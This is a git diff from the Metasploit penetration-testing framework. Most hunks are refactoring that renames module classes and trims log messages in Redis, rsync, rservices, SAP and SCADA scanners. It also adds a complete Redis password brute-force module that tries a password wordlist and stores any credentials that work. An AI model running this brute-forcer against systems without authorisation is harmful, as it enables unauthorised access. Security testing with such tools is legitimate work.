--- a/modules/auxiliary/scanner/redis/file_upload.rb +++ b/modules/auxiliary/scanner/redis/file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis def initialize(info = {}) diff --git a/modules/auxiliary/scanner/redis/redis_login.rb b/modules/auxiliary/scanner/redis/redis_login.rb new file mode 100644 index 0000000000..3c20561c86 --- /dev/null +++ b/modules/auxiliary/scanner/redis/redis_login.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'metasploit/framework/login_scanner/redis' +require 'metasploit/framework/credential_collection' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Redis + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Redis Login Utility', + 'Description' => 'This module attempts to authenticate to an REDIS service.', + 'Author' => [ 'Nixawk' ], + 'References' => [ + ['URL', 'http://redis.io/topics/protocol'] + ], + 'License' => MSF_LICENSE)) + + register_options( + [ + OptPath.new('PASS_FILE', + [ + false, + 'The file that contains a list of of probable passwords.', + File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') + ]) + ], self.class) + + # redis does not have an username, there's only password + deregister_options('USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'DB_ALL_USERS', 'DB_ALL_CREDS') + end + + def run_host(ip) + cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], + password: datastore['PASSWORD'], + # The LoginScanner API refuses to run if there's no username, so we give it a fake one. + # But we will not be reporting this to the database. + username: 'redis' + ) + + cred_collection = prepend_db_passwords(cred_collection) + + scanner = Metasploit::Framework::LoginScanner::Redis.new( + host: ip, + port: rport, + proxies: datastore['PROXIES'], + cred_details: cred_collection, + stop_on_success: datastore['STOP_ON_SUCCESS'], + connection_timeout: 30 + ) + + scanner.scan! do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + credential_data.delete(:username) # This service uses no username + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + + if datastore['VERBOSE'] + vprint_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential} (#{result.status}: #{result.proof})" + else + print_good "#{peer} - LOGIN SUCCESSFUL: #{result.credential}" + end + when Metasploit::Model::Login::Status::NO_AUTH_REQUIRED + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + break + else + invalidate_login(credential_data) + vprint_error "#{peer} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})" + end + end + end +end diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 2d85876963..69d0405e61 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -5,14 +5,14 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Redis include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, - 'Name' => 'Redis Scanner', + 'Name' => 'Redis Command Execute Scanner', 'Description' => %q( This module locates Redis endpoints by attempting to run a specified Redis command. @@ -33,15 +33,15 @@ class Metasploit3 < Msf::Auxiliary end def run_host(_ip) - vprint_status("#{peer} -- contacting redis") + vprint_status("Contacting redis") begin connect return unless (data = redis_command(command)) report_service(host: rhost, port: rport, name: "redis server", info: "#{command} response: #{data}") - print_good("#{peer} -- found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") + print_good("Found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::Errno::ETIMEDOUT => e - vprint_error("#{peer} -- error while communicating: #{e}") + vprint_error("Error while communicating: #{e}") ensure disconnect end diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index 4293d6bc1e..9b8dbe95d7 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index 9e2b9cf3ec..6c50275f34 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index f2a93ecf5a..9a1e4d7c83 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 7d1414a6d6..1ef454e273 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 8892b023d5..aac1d57444 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 37584933e1..ff68f8f088 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary elsif res =~ /^#{RSYNC_HEADER} OK$/ 'not required' else - vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}") + vprint_error("unexpected response when connecting to #{rmodule}: #{res}") "unexpected response '#{res}'" end else - vprint_error("#{peer} - no response when connecting to #{rmodule}") + vprint_error("no response when connecting to #{rmodule}") 'no response' end end @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary end unless version - vprint_error("#{peer} - no rsync negotiation found") + vprint_error("no rsync negotiation found") return end @@ -149,12 +149,12 @@ class Metasploit3 < Msf::Auxiliary connect version, motd = rsync_negotiate unless version - vprint_error("#{peer} - does not appear to be rsync") + vprint_error("does not appear to be rsync") disconnect return end rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while connecting and negotiating: #{e}") + vprint_error("error while connecting and negotiating: #{e}") disconnect return end @@ -168,24 +168,24 @@ class Metasploit3 < Msf::Auxiliary name: 'rsync', info: info ) - print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION'] - print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] + print_status("rsync version: #{version}") if datastore['SHOW_VERSION'] + print_status("rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] modules_metadata = {} begin modules_metadata = rsync_list rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} -- error while listing modules: #{e}") + vprint_error("Error while listing modules: #{e}") return ensure disconnect end if modules_metadata.empty? - print_status("#{peer} - no rsync modules found") + print_status("no rsync modules found") else modules = modules_metadata.map { |m| m[:name] } - print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}") + print_good("#{modules.size} rsync modules found: #{modules.join(', ')}") table_columns = %w(Name Comment) if datastore['TEST_AUTHENTICATION'] @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary rsync_negotiate module_metadata[:authentication] = get_rsync_auth_status(module_metadata[:name]) rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while testing authentication on #{module_metadata[:name]}: #{e}") + vprint_error("error while testing authentication on #{module_metadata[:name]}: #{e}") break ensure disconnect diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb index 3bff4eaa56..b93b5dd456 100644 --- a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb +++ b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb index 7865397e71..5acb133b6b 100644 --- a/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb +++ b/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb index 05ca2b7f4c..146a919d95 100644 --- a/modules/auxiliary/scanner/sap/sap_icf_public_info.rb +++ b/modules/auxiliary/scanner/sap/sap_icf_public_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7cea619121..1e9e63aa2e 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index f87e2d65f3..3a300ad761 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index b7543c4122..114d6758d9 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -95,7 +95,7 @@ class Metasploit4 < Msf::Auxiliary pass = pass.gsub("", datastore["SAP_SID"]) end - print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'") + print_status("Trying username:'#{user}' password:'#{pass}'") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index b1d033363b..fb3a9571bb 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index 1333c69ff8..ee9957196f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 15868dd886..7d4b52b594 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb index ccf26867ad..0081f81978 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb index d48d7dfd8b..6747e7263c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index a6027450f4..3f4cc9ebf3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index bb443cf0b6..76ab9d2360 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index f950718dba..d1d26c469f 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 43a943d552..27e3600b01 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 34c51c9eba..5f835712b5 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_info_request.rb b/modules/auxiliary/scanner/sap/sap_router_info_request.rb index c87f04e5b8..1edd8fdae9 100644 --- a/modules/auxiliary/scanner/sap/sap_router_info_request.rb +++ b/modules/auxiliary/scanner/sap/sap_router_info_request.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb index 79f9882999..d22432a080 100644 --- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb +++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index fa77142694..47921cdf7d 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_smb_relay.rb b/modules/auxiliary/scanner/sap/sap_smb_relay.rb index 3c832996bf..fb43861d0c 100644 --- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb +++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb index 1ae343ea5b..72033622a3 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb index 1febb6b023..f170841f30 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb index cd8e52f1ee..fe280f2599 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb index 05bbe78ec4..567db4db73 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb index 1658e8688d..3946cdc795 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb index 1547c002aa..2a5dc93882 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb @@ -22,7 +22,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb index 95a48c4de8..f8572c005c 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_ping.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb index f699e19db8..d7ee3ed5a9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_read_table.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb index e751c8e3cb..4a78406fc9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb @@ -23,7 +23,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb index 833901c516..21c1d4caba 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb index 0091f41be4..6946dff925 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb index 0480f0b23d..1302852087 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb index 5cfe258ca9..7069c66c5b 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb index a9400633cf..f7233c60d9 100644 --- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb +++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb @@ -16,7 +16,7 @@ require "msf/core" -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb index ebac99fd8b..a97e65fda8 100644 --- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb @@ -16,7 +16,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index a93c3dfafe..10c13f6ba1 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 3de56d9a43..25d2ccffaa 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/addp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb 